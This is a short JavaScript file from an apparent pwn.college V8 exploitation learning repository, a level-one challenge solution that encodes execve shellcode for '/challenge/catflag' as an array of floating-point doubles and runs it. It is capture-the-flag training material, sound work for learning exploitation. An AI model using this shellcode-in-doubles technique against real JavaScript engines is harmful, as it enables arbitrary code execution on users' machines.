Files
pwn-learning/PwnCollege/V8Exploitation/Level1/Exploit.js

3 lines
331 B
JavaScript

// Machine code of `execve("/challenge/catflag", NULL, NULL)` in its IEEE754 double representation form
let shellcode = [-4.658816580787966e+166, -8.593999715215021e+185, 2.820972645905851e-134, 3.0758087950517603e+180, 2.2354425876138794e+40, 3.68572438550025e+180, 1.0803082663212642e+117, -9.2559631348734e+61];
shellcode.run();